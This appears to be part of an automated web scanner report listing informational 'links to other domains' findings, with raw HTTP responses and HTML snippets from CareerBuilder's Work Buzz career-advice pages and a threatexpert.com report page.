<div class="facebook_like"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.theworkbuzz.com%2Fcareer-advice%2Fwomen-cautious-about-social-media-and-work%2F&layout=button_count&show_faces=false&width=130&action=recommend&font=arial&colorscheme=light&height=20" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:130px; height:21px;" allowTransparency="true"></iframe>
...[SNIP]...
<div class="tweet_button">
                    <a href="http://twitter.com/share?url=http://www.theworkbuzz.com/career-advice/women-cautious-about-social-media-and-work/&via=careerbuilder&count=horizontal" class="twitter-share-button">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="linkedin_share">
                   <script type="text/javascript" src="http://platform.linkedin.com/in.js"></script>
...[SNIP]...
<p><a href="http://www.decode.net/wp-content/uploads/DecodeSocialMediaatWorkReport.pdf" target="_blank">According to a new survey</a>
...[SNIP]...
s does tend to make people more careful, however. Nearly two-thirds of survey participants agreed that they were cautious about the content they put on their social networks, and for good reason. Need <a href="http://msn.careerbuilder.com/Article/MSN-2349-Workplace-Issues-12-Ways-to-Get-Fired-for-Facebook/" target="_blank">we remind you</a>..<a href="http://thehiringsite.careerbuilder.com/2010/11/12/facebook-can-get-you-fired-but-also-sued-and-more-news-from-this-week/" target="_blank">about all of the workers</a> <a href="http://http://www.careerbuilder.com/Article/CB-1831-Workplace-Issues-9-Ways-to-Get-Fired-by-Social-Media/" target="_blank">that have been fired</a>
...[SNIP]...
<p><a href="http://msn.careerbuilder.com/Article/MSN-1953-Workplace-Issues-Social-Media-Pitfalls/" target="_blank">Social media pitfalls</a>
...[SNIP]...
<p><a href="http://msn.careerbuilder.com/Article/MSN-2440-Workplace-Issues-Blogger-beware-A-few-things-you-should-know-before-blogging-about-work/">Blogger beware: A few things you should know before blogging about work </a>
...[SNIP]...
</div>
<script type="text/javascript" charset="utf-8" src="http://w.sharethis.com/widget/?wp=2.6.1&publisher=16298438-73ee-4f37-8234-2c6423690e18"></script>
...[SNIP]...
<div class="textwidget"><a href="http://www.careerbuilder.com?lr=workbuzz&siteid=rkbuzzlg" alt="CareerBuilder.com"><img src="http://img.icbdr.com/images/plink/logos/powered_by_cb_logo.gif" border="0" /></a>
...[SNIP]...
<li id="twitter-follow"><a href="http://twitter.com/CareerBuilder" rel="external">Twitter</a></li><li id="facebook-follow"><a href="http://www.facebook.com/careerbuilder" rel="external">Facebook</a>
...[SNIP]...
<br>
<img src=http://img.icbdr.com/images/pixel.gif width=1 height=1 vspace=2><br>
...[SNIP]...
<td style=padding-top:8px;>  - <a href="http://www.careerbuilder.com/jobseeker/jobs/jobfindadv.aspx?lr=workbuzz&siteid=workbuzz003">
           <font face="arial,helvetica" size="1" style="font-size:11px;" color="000066">
...[SNIP]...
<td style=padding-bottom:12px;>  - <a href="http://www.careerbuilder.com/jobseeker/companies/companysearch.aspx?lr=workbuzz&siteid=workbuzz003"><font face="arial,helvetica" size="1" style="font-size:11px;" color="000066">
...[SNIP]...
<div class="textwidget"><a href="http://alltop.com/"><img src="http://badges.alltop.com/images/alltop_170x30_we2.jpg" width="170" height="30" alt="Alltop. We're kind of a big deal." /></a>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
<div style="font-size:8px; padding-left:10px"><a href="http://www.facebook.com/careerbuilder">CareerBuilder on Facebook</a>
...[SNIP]...
<li><a href="http://www.blackcareers.com/" title="Black Careers">Black Careers</a>
...[SNIP]...
<li><a href="http://www.careerrookie.com/" title="CBcampus">Career Rookie</a>
...[SNIP]...
<li><a href="http://www.cbinstitute.com" title="CBInstitute">CBInstitute</a>
...[SNIP]...
<li><a href="http://www.cbresume.com" title="cbResume">cbResume</a></li>
<li><a href="http://www.CBSalary.com" title="CBsalary">CBsalary.com</a>
...[SNIP]...
<li><a href="http://www.careerpath.com" title="CareerPath">CareerPath</a>
...[SNIP]...
<li><a href="http://www.degreedriven.com" title="DegreeDriven">DegreeDriven</a>
...[SNIP]...
<li><a href="http://www.empleoscb.com" title="Empleos">Empleoscb</a></li>
<li><a href="http://www.employmentspot.com" title="Employment Spot">Employment Spot</a>
...[SNIP]...
<li><a href="http://www.jobs.net" title="Jobs.net">Jobs.net</a></li>
<li><a href="http://www.personified.com/">Personified</a>
...[SNIP]...
<li><a href="http://www.primecb.com/">PrimeCB</a></li>
<li><a href="http://www.truecareers.com" title="True Careers">True Careers</a>
...[SNIP]...
<li><a href="http://workinretail.com" title="WorkInRetail">WorkInRetail</a>
...[SNIP]...
<li><a href="http://www.thehiringsite.com/">The Hiring Site</a>
...[SNIP]...
<li><a href="http://askamanager.blogspot.com/">Ask A Manager</a>
...[SNIP]...
<li><a href="http://www.spherioncareerblog.com/">Big Time</a></li>
<li><a href="http://www.blogher.com/topic/business-career-personal-finance">BlogHer</a></li>
<li><a href="http://www.brazencareerist.com/">Brazen Careerist</a>
...[SNIP]...
<li><a href="http://www.careerhubblog.com/">CareerHub</a></li>
<li><a href="http://careerealism.wordpress.com/" title="Careerealism">Careerealism</a>
...[SNIP]...
<li><a href="http://blogs.wsj.com/laidoff/?mod=blogmod" target="_blank">CareerJournal: Laid Off and Looking</a>
...[SNIP]...
<li><a href="http://manpowerblogs.com/holmes/">Contemporary Working</a>
...[SNIP]...
<li><a href="http://www.employmentblawg.com/">Employment Blawg</a>
...[SNIP]...
<li><a href="http://evilhrlady.blogspot.com/">Evil HR Lady</a>
...[SNIP]...
<li><a href="http://www.fastcompany.com/blogs">Fast Company</a>
...[SNIP]...
<li><a href="http://www.fistfuloftalent.com/">Fistful of Talent</a>
...[SNIP]...
<li><a href="http://blog.generationrelations.com/" title="Generation Relations">Generation Relations</a>
...[SNIP]...
<li><a href="http://hrminion.blogspot.com/">HR Minion</a></li>
<li><a href="http://hrwench.blogspot.com/">HR Wench</a></li>
<li><a href="http://www.huffingtonpost.com/business/">HuffPost Business Blogs</a>
...[SNIP]...
<li><a href="http://www.humancapitalist.com/">Human Capitalist</a>
...[SNIP]...
<li><a href="http://www.jibberjobber.com/login.php">Jibber Jobber</a>
...[SNIP]...
<li><a href="http://www.jobsearchmarketing.com/">JobSearch Marketing Blog</a>
...[SNIP]...
<li><a href="http://www.jtodonnell.com/wordpress/" title="Career Insights">J.T. O’Donnell: Career Insights</a>
...[SNIP]...
<li><a href="http://keppiecareers.wordpress.com/">Keppie Careers</a>
...[SNIP]...
<li><a href="http://www.leapwalking.com/">Leap Walking</a>
...[SNIP]...
<li><a href="http://www.momsrising.org/momsblogging/">Moms Rising</a>
...[SNIP]...
<li><a href="http://blogs.msdn.com/heatherleigh/default.aspx">One Louder</a>
...[SNIP]...
<li><a href="http://www.usnews.com/blogs/outside-voices-careers/index.html">Outside Voices: Careers</a>
...[SNIP]...
<li><a href="http://blog.penelopetrunk.com/">Penelope Trunk</a>
...[SNIP]...
<li><a href="http://personalbrandingblog.wordpress.com/">Personal Branding</a>
...[SNIP]...
<li><a href="http://punkrockhr.com/">Punk Rock HR</a>
...[SNIP]...
<li><a href="http://sethgodin.typepad.com/" title="Seth Godin">Seth Godin</a>
...[SNIP]...
<li><a href="http://shiftingcareers.blogs.nytimes.com/">Shifting Careers</a>
...[SNIP]...
<li><a href="http://www.thefutureofwork.net/blog/">The Future of Work</a>
...[SNIP]...
<li><a href="http://alexandralevit.typepad.com" rel="colleague" target="_blank">Water Cooler Wisdom</a>
...[SNIP]...
<li><a href="http://blogs.abcnews.com/womenomics/" title="ABC News – Womenomics">Womenomics</a>
...[SNIP]...
<p>© Copyright <a href="http://www.careerbuilder.com/?SiteId=workbuzz004">CareerBuilder.com</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.wildfireapp.com/website/302/companies/130300/widget_loader.js"></script>
...[SNIP]...
<li class="MSNfirst"><a href="http://g.msn.com/2privacy/enus">MSN privacy</a>
...[SNIP]...
<li><a
href="http://g.msn.com/0TO_/enus">Legal</a></li><li><a href="http://advertising.msn.com/home/home.asp">
Advertise</a>
...[SNIP]...
<li class="last"><a href="http://rss.msn.com">RSS</a>
...[SNIP]...
<li class="MSNfirst"><a onclick="return Msn.Navigation.OpenPopup(this,'width=800,height=600,resizeable=no,status=no,titlebar=no,toolbar=no')"
href="http://careers.msn.com/help.aspx">Help</a></li><li class="MSNlast"><a href="https://feedback.msn.com/default.aspx?productkey=careers&mkt=en-us">Feedback</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-803759h&cg=0&cc=1&ts=noscript"
width="1" height="1" alt="" />
</div>
...[SNIP]...

17.391. http://www.theworkbuzz.com/employment-trends/video-interviews/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.theworkbuzz.com
Path:	/employment-trends/video-interviews/

Issue detail

The page was loaded from a URL containing a query string:

http://www.theworkbuzz.com/employment-trends/video-interviews/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers

The response contains the following links to other domains:

http://ads1.msn.com/library/dap.js?ver=3.0.4
http://advertising.msn.com/home/home.asp
http://alexandralevit.typepad.com/
http://alltop.com/
http://askamanager.blogspot.com/
http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS
http://autos.msn.com/default.aspx
http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1
http://badges.alltop.com/images/alltop_170x30_we2.jpg
http://blog.generationrelations.com/
http://blog.penelopetrunk.com/
http://blogs.abcnews.com/womenomics/
http://blogs.msdn.com/heatherleigh/default.aspx
http://blogs.wsj.com/laidoff/?mod=blogmod
http://blstc.msn.com/br/gbl/lg/1/l/msft.gif
http://blstj.msn.com/br/gbl/js/2/report.js?ver=3.0.4
http://blstj.msn.com/br/gbl/js/4/navigation.js?ver=3.0.4
http://careerealism.wordpress.com/
http://careers.msn.com/
http://careers.msn.com/help.aspx
http://cityguides.msn.com/
http://evilhrlady.blogspot.com/
http://g.msn.com/0AD00036/931292.1??HCType=1&CID=931292&PG=SHPHDR
http://g.msn.com/0TO_/enus
http://g.msn.com/2privacy/enus
http://games.msn.com/
http://health.msn.com/
http://hotmail.msn.com/
http://hrminion.blogspot.com/
http://hrwench.blogspot.com/
http://ie8.msn.com/microsoft/internet-explorer-8/en-us/ie8.aspx?ocid=B037MSN55C0403A
http://im.live.com/messenger/im/home/?source=MSNTDLINK
http://img.icbdr.com/images/pixel.gif
http://img.icbdr.com/images/plink/logos/powered_by_cb_logo.gif
http://keppiecareers.wordpress.com/
http://latino.msn.com/empleos/
http://lifestyle.msn.com/default.aspx
http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=10&ct=1241134192&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fcareers.msn.com%2F&lc=1033&id=74314
http://mail.live.com/
http://manpowerblogs.com/holmes/
http://maps.live.com/default.aspx?wip=2&v=2&rtp=~&FORM=MSNH
http://moneycentral.msn.com/
http://moneycentral.msn.com/home.asp
http://movies.msn.com/
http://msn.delish.com/
http://msn.foxsports.com/
http://msn.match.com/index.aspx?TrackingID=516163&BannerID=543351
http://msn.whitepages.com/
http://msn/
http://music.msn.com/
http://my.msn.com/
http://personalbrandingblog.wordpress.com/
http://platform.linkedin.com/in.js
http://platform.twitter.com/widgets.js
http://punkrockhr.com/
http://realestate.msn.com/
http://rss.msn.com/
http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-803759h&cg=0&cc=1&ts=noscript
http://sethgodin.typepad.com/
http://shiftingcareers.blogs.nytimes.com/
http://specials.msn.com/alphabet.aspx
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US
http://tech.msn.com/
http://tk2.stb.s-msn.com/i/96/5146F629B72E6A89B01B5FF61E30B8.gif
http://topsy.com/trackback?url=http%3A%2F%2Fwww.theworkbuzz.com%2Femployment-trends%2Fvideo-interviews%2F%3Fgt1%3D23000&utm_source=pingback&utm_campaign=L2
http://tv.msn.com/
http://twitter.com/CareerBuilder
http://twitter.com/share?url=http://www.theworkbuzz.com/employment-trends/video-interviews/&via=careerbuilder&count=horizontal
http://w.sharethis.com/widget/?wp=2.6.1&publisher=16298438-73ee-4f37-8234-2c6423690e18
http://weather.msn.com/
http://workinretail.com/
http://www.bing.com/travel?cid=msn_careers
http://www.blackcareers.com/
http://www.blogher.com/topic/business-career-personal-finance
http://www.brazencareerist.com/
http://www.careerbuilder.com/?SiteId=workbuzz004
http://www.careerbuilder.com/?lr=workbuzz&siteid=rkbuzzlg
http://www.careerbuilder.com/jobposter/products/page.aspx?pagever=OnlineInterviewsDemo&template=none&cachebypass=ye$
http://www.careerbuilder.com/jobseeker/companies/companysearch.aspx?lr=workbuzz&siteid=workbuzz003
http://www.careerbuilder.com/jobseeker/jobs/jobfindadv.aspx?lr=workbuzz&siteid=workbuzz003
http://www.careerhubblog.com/
http://www.careerpath.com/
http://www.careerrookie.com/
http://www.cbinstitute.com/
http://www.cbresume.com/
http://www.cbsalary.com/
http://www.contemporaryconcepts.org/
http://www.degreedriven.com/
http://www.empleoscb.com/
http://www.employmentblawg.com/
http://www.employmentspot.com/
http://www.facebook.com/careerbuilder
http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.theworkbuzz.com%2Femployment-trends%2Fvideo-interviews%2F&layout=button_count&show_faces=false&width=130&action=recommend&font=arial&colorscheme=light&height=20
http://www.fastcompany.com/blogs
http://www.fistfuloftalent.com/
http://www.hillgrp.com/
http://www.huffingtonpost.com/business/
http://www.humancapitalist.com/
http://www.jibberjobber.com/login.php
http://www.jobs.net/
http://www.jobsearchmarketing.com/
http://www.jtodonnell.com/wordpress/
http://www.leapwalking.com/
http://www.momsrising.org/momsblogging/
http://www.msn.com/
http://www.msnbc.msn.com/
http://www.onlinejobapplicationsblog.com/
http://www.personified.com/
http://www.primecb.com/
http://www.spherioncareerblog.com/
http://www.thefutureofwork.net/blog/
http://www.thehiringsite.com/
http://www.truecareers.com/
http://www.usnews.com/blogs/outside-voices-careers/index.html
http://www.vettannatogo.com/
http://www.wildfireapp.com/website/302/companies/130300/widget_loader.js
http://www.wonderwall.com/
http://yellowpages.msn.com/
https://feedback.msn.com/default.aspx?productkey=careers&mkt=en-us

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 16:17:41 GMT
X-Pingback: http://www.theworkbuzz.com/xmlrpc.php
Link: <http://www.theworkbuzz.com/?p=6605>; rel=shortlink
Connection: close
Set-Cookie: WP-Cobrand=msn; expires=Wed, 02-Feb-2011 18:41:02 GMT
Set-Cookie: X-Mapping-caklakng=46B1EFBB3B916447A34716FB66E1BFF9; path=/
Content-Length: 60935

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/
...[SNIP]...
</script>
<script type='text/javascript' src='http://blstj.msn.com/br/gbl/js/2/report.js?ver=3.0.4'></script>
<script type='text/javascript' src='http://blstj.msn.com/br/gbl/js/4/navigation.js?ver=3.0.4'></script>
<script type='text/javascript' src='http://ads1.msn.com/library/dap.js?ver=3.0.4'></script>
...[SNIP]...
<li class="MSNfirst"><a href="http://www.msn.com">MSN home</a></li><li><a href="http://hotmail.msn.com">Mail</a></li><li><a href="http://my.msn.com">My MSN</a></li><li class="MSNlast"><a href="http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=10&ct=1241134192&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fcareers.msn.com%2F&lc=1033&id=74314"
class="MSNdMSNME_1">Sign in</a>
...[SNIP]...
<li class="MSNfirst MSNselected"><a href="http://health.msn.com">health</a></li><li><a
href="http://moneycentral.msn.com">money</a></li><li><a href="http://www.bing.com/travel?cid=msn_careers">
travel</a>
...[SNIP]...
<li><a href="http://tech.msn.com/">tech</a>
...[SNIP]...
<li class="MSNfirst"><a href="http://mail.live.com"><img src="http://tk2.stb.s-msn.com/i/96/5146F629B72E6A89B01B5FF61E30B8.gif" width="25" height="20" alt="Hotmail" /><span>
...[SNIP]...
<li><a href="http://im.live.com/messenger/im/home/?source=MSNTDLINK" id="MSNmsg"><img src="http://tk2.stb.s-msn.com/i/96/5146F629B72E6A89B01B5FF61E30B8.gif" width="25" height="20" alt="Messenger" /><span>
...[SNIP]...
<li><a href="http://my.msn.com"><img src="http://tk2.stb.s-msn.com/i/96/5146F629B72E6A89B01B5FF61E30B8.gif" width="25" height="20" alt="My MSN" /><span>
...[SNIP]...
<li class="MSNlast"><a href="http://ie8.msn.com/microsoft/internet-explorer-8/en-us/ie8.aspx?ocid=B037MSN55C0403A"><img src="http://tk2.stb.s-msn.com/i/96/5146F629B72E6A89B01B5FF61E30B8.gif" width="25" height="20" alt="Internet Explorer 8" /><span>
...[SNIP]...
<li class="MSNfirst"><a href="http://www.bing.com/travel?cid=msn_careers">Airfares & Travel</a>
...[SNIP]...
<li><a href="http://autos.msn.com/default.aspx">Autos</a></li><li><a href="http://careers.msn.com">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://cityguides.msn.com">City Guides</a>
...[SNIP]...
<li class="MSNlast"><a href="http://msn.match.com/index.aspx?TrackingID=516163&BannerID=543351 ">Dating & Personals</a>
...[SNIP]...
<li class="MSNfirst"><a href="http://msn.delish.com/">Food & Entertaining</a>
...[SNIP]...
<li><a href="http://games.msn.com">Games</a></li><li><a href="http://health.msn.com">Health & Fitness</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS">Horoscopes</a></li><li class="MSNlast"><a href="http://lifestyle.msn.com/default.aspx">Lifestyle</a>
...[SNIP]...
<li class="MSNfirst"><a href="http://maps.live.com/default.aspx?wip=2&v=2&rtp=~&FORM=MSNH">Maps & Directions</a>
...[SNIP]...
<li><a href="http://moneycentral.msn.com/home.asp">Money</a></li><li><a href="http://movies.msn.com/">Movies</a></li><li><a href="http://music.msn.com">Music</a></li><li class="MSNlast"><a href="http://www.msnbc.msn.com/">News</a>
...[SNIP]...
<li class="MSNfirst"><a href="http://realestate.msn.com">Real Estate/Rentals</a>
...[SNIP]...
<li><a href="http://g.msn.com/0AD00036/931292.1??HCType=1&CID=931292&PG=SHPHDR">Shopping</a></li><li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://tech.msn.com">Tech & Gadgets</a>
...[SNIP]...
<li class="MSNlast"><a href="http://tv.msn.com">TV</a>
...[SNIP]...
<li class="MSNfirst"><a href="http://weather.msn.com">Weather</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.wonderwall.com/">Wonderwall</a></li><li><a href="http://yellowpages.msn.com">Yellow Pages</a>
...[SNIP]...
<li class="MSNlast"><a href="http://specials.msn.com/alphabet.aspx">MSN Directory</a>
...[SNIP]...
<div id="MSNlogo">
<a href="http://www.msn.com">
<img src="http://blstc.msn.com/br/gbl/lg/1/l/msft.gif" alt="go to MSN.com"
width="118" height="35" /></a><a class="MSNname" href="http://careers.msn.com">careers</a>
...[SNIP]...
<span><a href="http://latino.msn.com/empleos/">Español</a>
...[SNIP]...
<div class="facebook_like"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.theworkbuzz.com%2Femployment-trends%2Fvideo-interviews%2F&layout=button_count&show_faces=false&width=130&action=recommend&font=arial&colorscheme=light&height=20" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:130px; height:21px;" allowTransparency="true"></iframe>
...[SNIP]...
<div class="tweet_button">
                    <a href="http://twitter.com/share?url=http://www.theworkbuzz.com/employment-trends/video-interviews/&via=careerbuilder&count=horizontal" class="twitter-share-button">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="linkedin_share">
                   <script type="text/javascript" src="http://platform.linkedin.com/in.js"></script>
...[SNIP]...
<p>Recently, CareerBuilder began offering a tool for <a href="http://www.careerbuilder.com/jobposter/products/page.aspx?pagever=OnlineInterviewsDemo&template=none&cachebypass=ye$">companies to use online video interviews</a>
...[SNIP]...
coming years, we wanted to give you some tips that will put you ahead of other job seekers. To get insight on how a job seeker should approach a video interview, we talked to Jennifer Flaa, the CEO of <a href="http://www.vettannatogo.com/">Vettanna ToGo</a>
...[SNIP]...
</div>
<script type="text/javascript" charset="utf-8" src="http://w.sharethis.com/widget/?wp=2.6.1&publisher=16298438-73ee-4f37-8234-2c6423690e18"></script>
...[SNIP]...
<strong><a href='http://www.contemporaryconcepts.org' rel='external nofollow' class='url'>Sandra</a>
...[SNIP]...
<strong><a href='http://www.contemporaryconcepts.org' rel='external nofollow' class='url'>Sandra</a>
...[SNIP]...
<strong><a href='http://www.onlinejobapplicationsblog.com' rel='external nofollow' class='url'>Nick</a>
...[SNIP]...
<strong><a href='http://www.hillgrp.com' rel='external nofollow' class='url'>Francesca</a>
...[SNIP]...
<strong><a href='http://msn' rel='external nofollow' class='url'>LARock</a>
...[SNIP]...
<strong><a href='http://www.contemporaryconcepts.org' rel='external nofollow' class='url'>Sandra</a>
...[SNIP]...
<strong>From <a href='http://topsy.com/trackback?url=http%3A%2F%2Fwww.theworkbuzz.com%2Femployment-trends%2Fvideo-interviews%2F%3Fgt1%3D23000&utm_source=pingback&utm_campaign=L2' rel='external nofollow' class='url'>Tweets that mention Are you ready for video interviews? : The Work Buzz -- Topsy.com</a>
...[SNIP]...
<div class="textwidget"><a href="http://www.careerbuilder.com?lr=workbuzz&siteid=rkbuzzlg" alt="CareerBuilder.com"><img src="http://img.icbdr.com/images/plink/logos/powered_by_cb_logo.gif" border="0" /></a>
...[SNIP]...
<li id="twitter-follow"><a href="http://twitter.com/CareerBuilder" rel="external">Twitter</a></li><li id="facebook-follow"><a href="http://www.facebook.com/careerbuilder" rel="external">Facebook</a>
...[SNIP]...
<br>
<img src=http://img.icbdr.com/images/pixel.gif width=1 height=1 vspace=2><br>
...[SNIP]...
<td style=padding-top:8px;>  - <a href="http://www.careerbuilder.com/jobseeker/jobs/jobfindadv.aspx?lr=workbuzz&siteid=workbuzz003">
           <font face="arial,helvetica" size="1" style="font-size:11px;" color="000066">
...[SNIP]...
<td style=padding-bottom:12px;>  - <a href="http://www.careerbuilder.com/jobseeker/companies/companysearch.aspx?lr=workbuzz&siteid=workbuzz003"><font face="arial,helvetica" size="1" style="font-size:11px;" color="000066">
...[SNIP]...
<div class="textwidget"><a href="http://alltop.com/"><img src="http://badges.alltop.com/images/alltop_170x30_we2.jpg" width="170" height="30" alt="Alltop. We're kind of a big deal." /></a>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
<div style="font-size:8px; padding-left:10px"><a href="http://www.facebook.com/careerbuilder">CareerBuilder on Facebook</a>
...[SNIP]...
<li><a href="http://www.blackcareers.com/" title="Black Careers">Black Careers</a>
...[SNIP]...
<li><a href="http://www.careerrookie.com/" title="CBcampus">Career Rookie</a>
...[SNIP]...
<li><a href="http://www.cbinstitute.com" title="CBInstitute">CBInstitute</a>
...[SNIP]...
<li><a href="http://www.cbresume.com" title="cbResume">cbResume</a></li>
<li><a href="http://www.CBSalary.com" title="CBsalary">CBsalary.com</a>
...[SNIP]...
<li><a href="http://www.careerpath.com" title="CareerPath">CareerPath</a>
...[SNIP]...
<li><a href="http://www.degreedriven.com" title="DegreeDriven">DegreeDriven</a>
...[SNIP]...
<li><a href="http://www.empleoscb.com" title="Empleos">Empleoscb</a></li>
<li><a href="http://www.employmentspot.com" title="Employment Spot">Employment Spot</a>
...[SNIP]...
<li><a href="http://www.jobs.net" title="Jobs.net">Jobs.net</a></li>
<li><a href="http://www.personified.com/">Personified</a>
...[SNIP]...
<li><a href="http://www.primecb.com/">PrimeCB</a></li>
<li><a href="http://www.truecareers.com" title="True Careers">True Careers</a>
...[SNIP]...
<li><a href="http://workinretail.com" title="WorkInRetail">WorkInRetail</a>
...[SNIP]...
<li><a href="http://www.thehiringsite.com/">The Hiring Site</a>
...[SNIP]...
<li><a href="http://askamanager.blogspot.com/">Ask A Manager</a>
...[SNIP]...
<li><a href="http://www.spherioncareerblog.com/">Big Time</a></li>
<li><a href="http://www.blogher.com/topic/business-career-personal-finance">BlogHer</a></li>
<li><a href="http://www.brazencareerist.com/">Brazen Careerist</a>
...[SNIP]...
<li><a href="http://www.careerhubblog.com/">CareerHub</a></li>
<li><a href="http://careerealism.wordpress.com/" title="Careerealism">Careerealism</a>
...[SNIP]...
<li><a href="http://blogs.wsj.com/laidoff/?mod=blogmod" target="_blank">CareerJournal: Laid Off and Looking</a>
...[SNIP]...
<li><a href="http://manpowerblogs.com/holmes/">Contemporary Working</a>
...[SNIP]...
<li><a href="http://www.employmentblawg.com/">Employment Blawg</a>
...[SNIP]...
<li><a href="http://evilhrlady.blogspot.com/">Evil HR Lady</a>
...[SNIP]...
<li><a href="http://www.fastcompany.com/blogs">Fast Company</a>
...[SNIP]...
<li><a href="http://www.fistfuloftalent.com/">Fistful of Talent</a>
...[SNIP]...
<li><a href="http://blog.generationrelations.com/" title="Generation Relations">Generation Relations</a>
...[SNIP]...
<li><a href="http://hrminion.blogspot.com/">HR Minion</a></li>
<li><a href="http://hrwench.blogspot.com/">HR Wench</a></li>
<li><a href="http://www.huffingtonpost.com/business/">HuffPost Business Blogs</a>
...[SNIP]...
<li><a href="http://www.humancapitalist.com/">Human Capitalist</a>
...[SNIP]...
<li><a href="http://www.jibberjobber.com/login.php">Jibber Jobber</a>
...[SNIP]...
<li><a href="http://www.jobsearchmarketing.com/">JobSearch Marketing Blog</a>
...[SNIP]...
<li><a href="http://www.jtodonnell.com/wordpress/" title="Career Insights">J.T. O’Donnell: Career Insights</a>
...[SNIP]...
<li><a href="http://keppiecareers.wordpress.com/">Keppie Careers</a>
...[SNIP]...
<li><a href="http://www.leapwalking.com/">Leap Walking</a>
...[SNIP]...
<li><a href="http://www.momsrising.org/momsblogging/">Moms Rising</a>
...[SNIP]...
<li><a href="http://blogs.msdn.com/heatherleigh/default.aspx">One Louder</a>
...[SNIP]...
<li><a href="http://www.usnews.com/blogs/outside-voices-careers/index.html">Outside Voices: Careers</a>
...[SNIP]...
<li><a href="http://blog.penelopetrunk.com/">Penelope Trunk</a>
...[SNIP]...
<li><a href="http://personalbrandingblog.wordpress.com/">Personal Branding</a>
...[SNIP]...
<li><a href="http://punkrockhr.com/">Punk Rock HR</a>
...[SNIP]...
<li><a href="http://sethgodin.typepad.com/" title="Seth Godin">Seth Godin</a>
...[SNIP]...
<li><a href="http://shiftingcareers.blogs.nytimes.com/">Shifting Careers</a>
...[SNIP]...
<li><a href="http://www.thefutureofwork.net/blog/">The Future of Work</a>
...[SNIP]...
<li><a href="http://alexandralevit.typepad.com" rel="colleague" target="_blank">Water Cooler Wisdom</a>
...[SNIP]...
<li><a href="http://blogs.abcnews.com/womenomics/" title="ABC News – Womenomics">Womenomics</a>
...[SNIP]...
<p>© Copyright <a href="http://www.careerbuilder.com/?SiteId=workbuzz004">CareerBuilder.com</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.wildfireapp.com/website/302/companies/130300/widget_loader.js"></script>
...[SNIP]...
<li class="MSNfirst"><a href="http://g.msn.com/2privacy/enus">MSN privacy</a>
...[SNIP]...
<li><a
href="http://g.msn.com/0TO_/enus">Legal</a></li><li><a href="http://advertising.msn.com/home/home.asp">
Advertise</a>
...[SNIP]...
<li class="last"><a href="http://rss.msn.com">RSS</a>
...[SNIP]...
<li class="MSNfirst"><a onclick="return Msn.Navigation.OpenPopup(this,'width=800,height=600,resizeable=no,status=no,titlebar=no,toolbar=no')"
href="http://careers.msn.com/help.aspx">Help</a></li><li class="MSNlast"><a href="https://feedback.msn.com/default.aspx?productkey=careers&mkt=en-us">Feedback</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-803759h&cg=0&cc=1&ts=noscript"
width="1" height="1" alt="" />
</div>
...[SNIP]...

17.392. http://www.threatexpert.com/report.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/report.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.threatexpert.com/report.aspx?md5=57eb54a5e3fe2c152c3e438277376933

The response contains the following link to another domain:

http://www.google-analytics.com/urchin.js

Request

GET /report.aspx?md5=57eb54a5e3fe2c152c3e438277376933 HTTP/1.1
Host: www.threatexpert.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:29:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
